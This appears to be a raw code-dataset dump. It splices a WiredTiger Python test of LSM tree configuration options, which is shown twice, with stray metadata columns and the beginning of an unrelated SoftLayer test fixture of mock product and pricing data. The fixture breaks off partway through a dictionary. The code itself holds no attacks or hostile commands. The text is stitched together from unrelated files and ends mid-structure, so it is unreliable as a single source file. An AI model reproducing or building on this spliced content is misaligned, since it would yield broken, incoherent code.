# OTHER DEALINGS IN THE SOFTWARE.
import wiredtiger, wtscenario, wttest
from wtdataset import SimpleDataSet
# test_lsm01.py
# Test LSM tree configuration options.
class test_lsm01(wttest.WiredTigerTestCase):
K = 1024
M = 1024 * K
G = 1024 * M
uri = "lsm:test_lsm01"
chunk_size_scenarios = wtscenario.quick_scenarios('s_chunk_size',
[1*M,20*M,None], [0.6,0.6,0.6])
merge_max_scenarios = wtscenario.quick_scenarios('s_merge_max',
[2,10,20,None], None)
bloom_scenarios = wtscenario.quick_scenarios('s_bloom',
[True,False,None], None)
bloom_bit_scenarios = wtscenario.quick_scenarios('s_bloom_bit_count',
[2,8,20,None], None)
bloom_hash_scenarios = wtscenario.quick_scenarios('s_bloom_hash_count',
[2,10,20,None], None)
# Occasionally add a lot of records, so that merges (and bloom) happen.
record_count_scenarios = wtscenario.quick_scenarios(
'nrecs', [10, 10000], [0.9, 0.1])
config_vars = [ 'chunk_size', 'merge_max', 'bloom',
'bloom_bit_count', 'bloom_hash_count' ]
scenarios = wtscenario.make_scenarios(
chunk_size_scenarios, merge_max_scenarios, bloom_scenarios,
bloom_bit_scenarios, bloom_hash_scenarios, record_count_scenarios,
prune=100, prunelong=500)
# Test drop of an object.
def test_lsm(self):
args = 'key_format=S'
args += ',lsm=(' # Start the LSM configuration options.
# add names to args, e.g. args += ',session_max=30'
for var in self.config_vars:
value = getattr(self, 's_' + var)
if value != None:
if var == 'verbose':
value = '[' + str(value) + ']'
if value == True:
value = 'true'
if value == False:
value = 'false'
args += ',' + var + '=' + str(value)
args += ')' # Close the LSM configuration option group
self.verbose(3,
'Test LSM with config: ' + args + ' count: ' + str(self.nrecs))
SimpleDataSet(self, self.uri, self.nrecs).populate()
# TODO: Adding an explicit drop here can cause deadlocks, if a merge
# is still happening. See issue #349.
# self.session.drop(self.uri)
if __name__ == '__main__':
wttest.run()
| 41.011364
| 76
| 0.665281
|
import wiredtiger, wtscenario, wttest
from wtdataset import SimpleDataSet
class test_lsm01(wttest.WiredTigerTestCase):
K = 1024
M = 1024 * K
G = 1024 * M
uri = "lsm:test_lsm01"
chunk_size_scenarios = wtscenario.quick_scenarios('s_chunk_size',
[1*M,20*M,None], [0.6,0.6,0.6])
merge_max_scenarios = wtscenario.quick_scenarios('s_merge_max',
[2,10,20,None], None)
bloom_scenarios = wtscenario.quick_scenarios('s_bloom',
[True,False,None], None)
bloom_bit_scenarios = wtscenario.quick_scenarios('s_bloom_bit_count',
[2,8,20,None], None)
bloom_hash_scenarios = wtscenario.quick_scenarios('s_bloom_hash_count',
[2,10,20,None], None)
record_count_scenarios = wtscenario.quick_scenarios(
'nrecs', [10, 10000], [0.9, 0.1])
config_vars = [ 'chunk_size', 'merge_max', 'bloom',
'bloom_bit_count', 'bloom_hash_count' ]
scenarios = wtscenario.make_scenarios(
chunk_size_scenarios, merge_max_scenarios, bloom_scenarios,
bloom_bit_scenarios, bloom_hash_scenarios, record_count_scenarios,
prune=100, prunelong=500)
def test_lsm(self):
args = 'key_format=S'
args += ',lsm=('
for var in self.config_vars:
value = getattr(self, 's_' + var)
if value != None:
if var == 'verbose':
value = '[' + str(value) + ']'
if value == True:
value = 'true'
if value == False:
value = 'false'
args += ',' + var + '=' + str(value)
args += ')'
self.verbose(3,
'Test LSM with config: ' + args + ' count: ' + str(self.nrecs))
SimpleDataSet(self, self.uri, self.nrecs).populate()
if __name__ == '__main__':
wttest.run()
| true
| true
|
f705b0edb87ae2c78f1229ba615f3eb737a2e382
| 68,829
|
py
|
Python
|
SoftLayer/fixtures/SoftLayer_Product_Package.py
|
kz6fittycent/softlayer-python
|
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
|
[
"MIT"
] | null | null | null |
SoftLayer/fixtures/SoftLayer_Product_Package.py
|
kz6fittycent/softlayer-python
|
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
|
[
"MIT"
] | null | null | null |
SoftLayer/fixtures/SoftLayer_Product_Package.py
|
kz6fittycent/softlayer-python
|
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
|
[
"MIT"
] | null | null | null |
# pylint: skip-file
HARDWARE_ITEMS = [
{'attributes': [],
'capacity': '999',
'description': 'Unknown',
'itemCategory': {'categoryCode': 'unknown', 'id': 325},
'keyName': 'UNKNOWN',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1245172,
"locationGroupId": '',
'itemId': 935954,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '64',
'description': '1 IPv6 Address',
'itemCategory': {'categoryCode': 'pri_ipv6_addresses',
'id': 325},
'keyName': '1_IPV6_ADDRESS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 17129,
"locationGroupId": '',
'itemId': 4097,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '10',
'description': '10 Mbps Public & Private Network Uplinks',
'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 272,
"locationGroupId": '',
'itemId': 186,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 5}]},
{'attributes': [],
'capacity': '0',
'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
'itemCategory': {'categoryCode': 'os', 'id': 12},
'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 37650,
"locationGroupId": '',
'itemId': 4702,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 9}],
'softwareDescription': {'id': 1362,
'longDescription': 'Ubuntu / 14.04-64',
'referenceCode': 'UBUNTU_14_64'}},
{'attributes': [],
'capacity': '1',
'description': '1 IP Address',
'itemCategory': {'categoryCode': 'pri_ip_addresses', 'id': 13},
'keyName': '1_IP_ADDRESS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 21,
"locationGroupId": '',
'itemId': 15,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [{'attributeTypeKeyName': 'RECLAIM_BYPASS',
'id': 1014}],
'description': 'Unlimited SSL VPN Users',
'itemCategory': {'categoryCode': 'vpn_management', 'id': 31},
'keyName': 'SSL_VPN_USERS_1_PPTP_VPN_USER_PER_ACCOUNT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 420,
"locationGroupId": '',
'itemId': 309,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'description': 'Reboot / KVM over IP',
'itemCategory': {'categoryCode': 'remote_management',
'id': 46},
'keyName': 'REBOOT_KVM_OVER_IP',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 906,
"locationGroupId": '',
'itemId': 504,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'id': 22505,
"locationGroupId": '',
'itemId': 4481,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 98}]},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB_2',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1800,
"locationGroupId": '',
'itemId': 439,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 99}]}]
ENTERPRISE_PACKAGE = {
'categories': [
{'categoryCode': 'storage_service_enterprise'}
],
'id': 240,
'name': 'Endurance',
'items': [
{
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_service_enterprise'},
'keyName': 'CODENAME_PRIME_STORAGE_SERVICE',
'prices': [
{
'categories': [
{'categoryCode': 'storage_service_enterprise'}
],
'id': 45058,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_file'},
'keyName': 'FILE_STORAGE_2',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 45108,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_block'},
'keyName': 'BLOCK_STORAGE_2',
'prices': [
{
'categories': [
{'categoryCode': 'storage_block'}
],
'id': 45098,
'locationGroupId': ''
}
]
}, {
'capacity': '10',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '10_GB_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 46160,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 46170,
'locationGroupId': ''
}
]
}, {
'capacity': '20',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 45860,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 46659,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 45128,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 46789,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 45318,
'locationGroupId': ''
}
]
}, {
'attributes': [
{'value': '300'}
],
'capacity': '300',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': 'WRITEHEAVY_TIER',
'prices': [
{
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'id': 45088,
'locationGroupId': ''
}
]
}, {
'attributes': [
{'value': '200'}
],
'capacity': '200',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': 'READHEAVY_TIER',
'prices': [
{
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'id': 45078,
'locationGroupId': ''
}
]
}
]
}
PERFORMANCE_PACKAGE = {
'categories': [
{'categoryCode': 'performance_storage_iscsi'},
{'categoryCode': 'performance_storage_nfs'}
],
'id': 222,
'name': 'Performance',
'items': [
{
'capacity': '0',
'itemCategory': {'categoryCode': 'performance_storage_iscsi'},
'keyName': 'BLOCK_STORAGE_PERFORMANCE_ISCSI',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_iscsi'}
],
'id': 40672,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'performance_storage_nfs'},
'keyName': 'FILE_STORAGE_PERFORMANCE_NFS',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_nfs'}
],
'id': 40662,
'locationGroupId': ''
}
]
}, {
'capacity': '20',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 40682,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 40742,
'locationGroupId': ''
}
]
}, {
'capacity': '800',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'keyName': '800_IOPS_4',
'prices': [
{
'capacityRestrictionMaximum': '1000',
'capacityRestrictionMinimum': '100',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 41562,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'keyName': '1000_IOPS',
'prices': [
{
'capacityRestrictionMaximum': '20',
'capacityRestrictionMinimum': '20',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 40882,
'locationGroupId': ''
}
]
}
]
}
SAAS_PACKAGE = {
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'id': 759,
'name': 'Storage As A Service (StaaS)',
'items': [
{
'capacity': '0',
'keyName': '',
'prices': [
{
'id': 189433,
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_block'}
],
'id': 189443,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 189453,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '999',
'capacityMinimum': '500',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '500_999_GBS',
'prices': [
{
'id': 189993,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '1999',
'capacityMinimum': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_1999_GBS',
'prices': [
{
'id': 190113,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '12000',
'capacityMinimum': '1',
'keyName': 'STORAGE_SPACE_FOR_2_IOPS_PER_GB',
'prices': [
{
'id': 193433,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '12000',
'capacityMinimum': '1',
'keyName': 'STORAGE_SPACE_FOR_4_IOPS_PER_GB',
'prices': [
{
'id': 194763,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '10000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '999',
'capacityRestrictionMinimum': '500',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190053,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '20000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '1999',
'capacityRestrictionMinimum': '1000',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190173,
'locationGroupId': ''
}
]
}, {
'capacity': '200',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': '',
'prices': [
{
'id': 193373,
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '300',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': '',
'prices': [
{
'id': 194703,
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '10',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '48000',
'capacityRestrictionMinimum': '100',
'capacityRestrictionType': 'IOPS',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 191193,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193613,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 194943,
'locationGroupId': ''}]
}, {
'capacity': '20',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193853,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {
'categoryCode': 'performance_storage_replication'
},
'keyName': 'REPLICATION_FOR_IOPSBASED_PERFORMANCE',
'prices': [
{
'capacityRestrictionMaximum': '48000',
'capacityRestrictionMinimum': '1',
'capacityRestrictionType': 'IOPS',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 192033,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {
'categoryCode': 'performance_storage_replication'
},
'keyName': 'REPLICATION_FOR_TIERBASED_PERFORMANCE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 194693,
'locationGroupId': ''
}
]
}
]
}
SAAS_REST_PACKAGE = {
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'id': 759,
'name': 'Storage As A Service (StaaS)',
'items': [
{
'capacity': '0',
'keyName': '',
'prices': [
{
'id': 189433,
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'locationGroupId': None
}
]
}, {
'capacity': '20',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193853,
'locationGroupId': None
}
]
}, {
'capacity': '0',
'capacityMaximum': '1999',
'capacityMinimum': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_1999_GBS',
'prices': [
{
'id': 190113,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': None
}
]
}, {
'capacity': '0',
'capacityMaximum': '20000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '1999',
'capacityRestrictionMinimum': '1000',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190173,
'locationGroupId': None
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 189453,
'locationGroupId': None
}
]
}
]
}
activePreset1 = {
'description': 'Single Xeon 1270, 8GB Ram, 2x1TB SATA disks, Non-RAID',
'id': 64,
'isActive': '1',
'keyName': 'S1270_8GB_2X1TBSATA_NORAID',
'name': 'S1270 8GB 2X1TBSATA NORAID',
'packageId': 200,
'prices': [
{
"hourlyRecurringFee": "1.18",
"id": 165711,
"locationGroupId": '',
"recurringFee": "780",
}
]
}
activePreset2 = {
'description': 'Dual Xeon Gold, 384GB Ram, 4x960GB SSD, RAID 10',
'id': 65,
'isActive': '1',
'keyName': 'DGOLD_6140_384GB_4X960GB_SSD_SED_RAID_10',
'name': 'DGOLD 6140 384GB 4X960GB SSD SED RAID 10',
'packageId': 200,
'prices': [
{
"hourlyRecurringFee": "1.18",
"id": 165711,
"locationGroupId": '',
"recurringFee": "780",
}
]
}
getAllObjects = [{
'activePresets': [activePreset1],
'accountRestrictedActivePresets': [activePreset2],
'description': 'Bare Metal Server',
'firstOrderStepId': 1,
'id': 200,
'isActive': 1,
'items': HARDWARE_ITEMS,
'name': 'Bare Metal Server',
'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01'}},
'sortOrder': 10}],
'subDescription': 'Bare Metal Server',
'unitSize': 1,
"itemPrices": [
{
"hourlyRecurringFee": ".027",
"id": 205911,
"laborFee": "0",
"locationGroupId": 505,
"capacityRestrictionMaximum": "40",
"capacityRestrictionMinimum": "40",
"capacityRestrictionType": "CORE",
"item": {
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
}
},
{
"hourlyRecurringFee": "0",
"id": 199467,
"laborFee": "0",
"locationGroupId": '',
"recurringFee": "0",
"item": {
"capacity": "0",
"description": "Load Balancer Bandwidth",
"id": 10051,
"keyName": "LOAD_BALANCER_BANDWIDTH",
}
},
{
"hourlyRecurringFee": ".028",
"id": 205913,
"laborFee": "0",
"locationGroupId": 507,
"item": {
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
}
}]
}]
getItems = [
{
'id': 1234,
'keyName': 'KeyName01',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'softwareDescription': {
'id': 1228,
'longDescription': 'Redhat EL 5.10-64',
'referenceCode': 'REDHAT_5_64'
},
'prices': [{'id': 1122,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 2233,
'keyName': 'KeyName02',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'prices': [{'id': 4477,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 1239,
'keyName': 'KeyName03',
'capacity': '2',
'description': 'RAM',
'itemCategory': {'categoryCode': 'RAM'},
'prices': [{'id': 1133,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 3,
'name': 'RAM',
'categoryCode': 'ram'}]}],
},
{
'id': 1240,
'keyName': 'KeyName014',
'capacity': '4',
'units': 'PRIVATE_CORE',
'description': 'Computing Instance (Dedicated)',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 1007,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 1250,
'keyName': 'KeyName015',
'capacity': '4',
'units': 'CORE',
'description': 'Computing Instance',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 1144,
'locationGroupId': None,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 112233,
'keyName': 'KeyName016',
'capacity': '55',
'units': 'CORE',
'description': 'Computing Instance',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 332211,
'locationGroupId': 1,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 4439,
'keyName': 'KeyName017',
'capacity': '1',
'description': '1 GB iSCSI Storage',
'itemCategory': {'categoryCode': 'iscsi'},
'prices': [{'id': 2222, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 1121,
'keyName': 'KeyName081',
'capacity': '20',
'description': '20 GB iSCSI snapshot',
'itemCategory': {'categoryCode': 'iscsi_snapshot_space'},
'prices': [{'id': 2014, 'hourlyRecurringFee': 0.10}],
},
{
'id': 4440,
'keyName': 'KeyName019',
'capacity': '4',
'description': '4 Portable Public IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
'prices': [{'id': 4444, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 8880,
'keyName': 'KeyName0199',
'capacity': '8',
'description': '8 Portable Public IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
'prices': [{'id': 8888, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 44400,
'keyName': 'KeyName0155',
'capacity': '4',
'description': '4 Portable Private IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
'prices': [{'id': 44441, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 88800,
'keyName': 'KeyName0144',
'capacity': '8',
'description': '8 Portable Private IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
'prices': [{'id': 88881, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
},
{
'id': 10,
'keyName': 'KeyName0341',
'capacity': '0',
'description': 'Global IPv4',
'itemCategory': {'categoryCode': 'global_ipv4'},
'prices': [{'id': 11, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
},
{
'id': 66464,
'keyName': '1_IPV6_ADDRESS',
'capacity': '64',
'description': '/64 Block Portable Public IPv6 Addresses',
'itemCategory': {'categoryCode': 'static_ipv6_addresses'},
'prices': [{'id': 664641, 'hourlyRecurringFee': '0', 'locationGroupId': '', 'recurringFee': '0'}],
},
{
'id': 610,
'keyName': 'KeyName031',
'capacity': '0',
'description': 'Global IPv6',
'itemCategory': {'categoryCode': 'global_ipv6'},
'prices': [{'id': 611, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB_2',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1800,
"locationGroupId": '',
'itemId': 439,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 99}]},
{'attributes': [],
'capacity': '10',
'description': '10 Mbps Public & Private Network Uplinks',
'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 272,
"locationGroupId": '',
'itemId': 186,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 5}]},
{'attributes': [],
'capacity': '0',
'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
'itemCategory': {'categoryCode': 'os', 'id': 12},
'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0.10',
'id': 37650,
"locationGroupId": '',
'itemId': 4702,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0.1',
'setupFee': '0.1',
'sort': 9}],
'softwareDescription': {'id': 1362,
'longDescription': 'Ubuntu / 14.04-64',
'referenceCode': 'UBUNTU_14_64'}}
]
getItemPricesISCSI = [
{
'currentPriceFlag': '',
'id': 2152,
'item': {
'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{'id': 46626,
'itemPriceId': 2152, 'packageId': 0}],
'quantity': '',
'recurringFee': '.35',
'setupFee': '0',
'sort': 0
},
{
'currentPriceFlag': '',
'id': 22501,
'item': {'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{
'id': 252983,
'itemPriceId': 22501, 'packageId': 0
}],
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0
},
{
'currentPriceFlag': '',
'id': 22441,
'item': {
'capacity': '1',
